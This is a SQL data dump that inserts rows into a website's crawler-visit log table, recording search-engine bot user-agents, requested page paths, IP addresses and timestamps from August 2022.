INSERT INTO `ey_weapp_spider_visit` VALUES ('96020', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/message/', '66.249.79.112', '1661147831', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96023', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/gjxw/', '66.249.79.112', '1661149143', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95977', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '117.25.139.73', '1661126235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95979', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/214.html', '114.119.151.155', '1661128264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95986', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/77.html', '114.119.151.153', '1661131930', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95991', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/65.html', '185.191.171.44', '1661134675', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95987', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/82.html', '114.119.151.153', '1661132022', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95976', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.112', '1661125476', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95978', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_4.html', '220.181.108.176', '1661127545', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95973', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.103', '1661124255', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96037', '99', 'mozilla/5.0 (compatible; mojeekbot/0.11; +https://www.mojeek.com/bot.html)', '/', '5.102.173.71', '1661156249', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95964', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_17.html', '220.181.108.92', '1661117726', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95972', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.183.224.19', '1661123646', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95974', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_44/', '220.181.108.158', '1661124272', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95962', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_42.html', '185.191.171.6', '1661115989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95963', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/226.html', '185.191.171.17', '1661116574', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95966', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/index.php', '66.249.79.108', '1661119354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95965', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1661118322', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95955', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/257.html', '114.119.151.153', '1661111695', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95957', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/334.html', '17.121.113.89', '1661112492', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95961', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/contact/', '207.46.13.215', '1661115777', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95952', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.108', '1661109497', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95950', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/82.html', '66.249.79.108', '1661109324', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95943', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_62/', '114.119.151.153', '1661107290', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95954', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/1_15.html', '116.179.32.142', '1661111181', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95946', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/427.html', '114.119.151.155', '1661108331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95942', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/212.html', '66.249.79.112', '1661107212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96054', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/33.html', '116.179.32.66', '1661163545', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95938', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_30.html', '185.191.171.26', '1661104890', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95937', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_33/', '185.191.171.11', '1661104192', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95933', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_43/', '114.119.151.155', '1661103375', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96302', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/347.html', '114.119.151.155', '1661245235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95956', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/369.html', '185.191.171.35', '1661111717', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96045', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/tags/226.html', '49.7.20.95', '1661159494', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95924', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/183.html', '185.191.171.37', '1661100112', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95918', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.214', '1661094031', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95919', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_33/', '220.181.108.84', '1661094818', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95931', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_13/', '66.249.79.110', '1661103097', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95917', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_25.html', '185.191.171.35', '1661092961', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96307', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/173.html', '116.179.32.104', '1661247580', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96306', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/57.html', '185.191.171.4', '1661246314', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95915', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1661092333', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95914', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.215.226', '1661091472', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96311', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.140', '1661249613', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95909', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/chezaibengal', '114.119.151.153', '1661082127', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95906', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/160.html', '185.191.171.43', '1661080662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95907', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/kms.html', '114.119.151.155', '1661081575', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95908', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.112', '1661081577', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95916', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/147.html', '66.249.79.108', '1661092397', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95905', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.215.226', '1661080274', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96044', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/488.html', '123.125.109.98', '1661159481', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95902', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/86.html', '66.249.79.108', '1661079723', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95899', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/449.html', '66.249.79.112', '1661078922', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95903', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_40.html', '185.191.171.19', '1661079952', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95904', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/case/', '220.181.108.84', '1661080159', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95894', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/410.html', '66.249.79.110', '1661077044', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95895', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/197.html', '185.191.171.34', '1661077471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95896', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/457.html', '220.181.108.157', '1661077483', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95910', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/77.html', '220.181.108.80', '1661082172', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95911', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661083148', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95913', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.112', '1661090212', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95912', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/115.html', '116.179.32.92', '1661084260', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96312', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/311.html', '185.191.171.8', '1661249914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96308', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/192.html', '185.191.171.37', '1661248287', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96309', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/151.html', '185.191.171.19', '1661248447', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96310', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/96.html', '116.179.32.160', '1661248471', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95928', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/129.html', '114.119.151.153', '1661102019', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96305', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/87.html', '116.179.32.202', '1661246276', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96303', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/165.html', '220.181.108.84', '1661245451', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95927', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/lijiang.html', '114.119.151.153', '1661101788', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96304', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/34.html', '220.181.108.177', '1661245863', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95932', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jm.html', '114.119.151.155', '1661103185', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95960', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/19.html', '185.191.171.1', '1661115093', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96038', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/jiaruwomen/', '114.119.151.155', '1661156650', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96042', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/165.html', '220.181.108.82', '1661157000', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95969', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1661121900', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95970', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/181.html', '66.249.79.110', '1661122976', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95975', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/267.html', '185.191.171.25', '1661124620', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96036', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_3.html', '185.191.171.3', '1661155438', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96005', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/57_3.html', '185.191.171.41', '1661140958', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95921', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/45.html', '185.191.171.5', '1661097113', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95922', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/283.html', '157.55.39.153', '1661097914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95923', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/278.html', '185.191.171.45', '1661097938', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95926', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_57/', '114.119.151.153', '1661101431', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95925', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/176.html', '116.179.32.14', '1661101362', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95968', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/80.html', '220.181.108.102', '1661120999', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95958', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661113174', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95959', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/bljxw/list_18_8/', '116.179.32.177', '1661114454', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95951', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/130.html', '185.191.171.15', '1661109431', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95948', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_21/', '185.191.171.40', '1661108869', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95947', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '207.46.13.9', '1661108601', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95949', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.108', '1661109223', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95940', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/410.html', '66.249.79.108', '1661105314', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95944', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/151.html', '185.191.171.36', '1661107300', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95945', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/tags/199.html', '66.249.79.110', '1661107893', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96051', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/', '185.191.171.23', '1661162526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95993', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661134808', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96014', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/495.html', '123.125.109.114', '1661145223', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95988', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_4/', '114.119.151.155', '1661132430', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95989', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.167', '1661134092', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95985', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/106.html', '185.191.171.3', '1661131805', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95992', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/65.html', '185.191.171.44', '1661134736', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96017', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '175.182.182.152', '1661147034', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95990', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.75', '1661134530', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95998', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '209.141.57.123', '1661139251', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95983', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/164.html', '116.179.32.210', '1661130818', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95981', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_58/', '114.119.151.153', '1661129076', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95953', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/400.html', '114.119.151.155', '1661110419', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95886', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/494.html', '157.55.39.90', '1661073109', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96319', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/497.html', '66.249.79.108', '1661252196', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95888', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/303.html', '114.119.151.153', '1661074526', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96314', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/33.html', '116.179.32.68', '1661250256', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95891', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/367.html', '220.181.108.81', '1661076588', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96313', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/news/344.html', '17.121.112.205', '1661250209', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95929', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/84.html', '114.119.151.153', '1661102606', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95930', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_34.html', '185.191.171.45', '1661102914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95935', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/397.html', '114.119.151.153', '1661103864', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95941', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ezs.html', '114.119.151.153', '1661106573', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95934', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/372.html', '114.119.151.153', '1661103464', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95939', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/187.html', '185.191.171.26', '1661105036', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95982', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/ptq.html', '114.119.151.155', '1661129550', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95980', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/308.html', '185.191.171.24', '1661128339', '0');
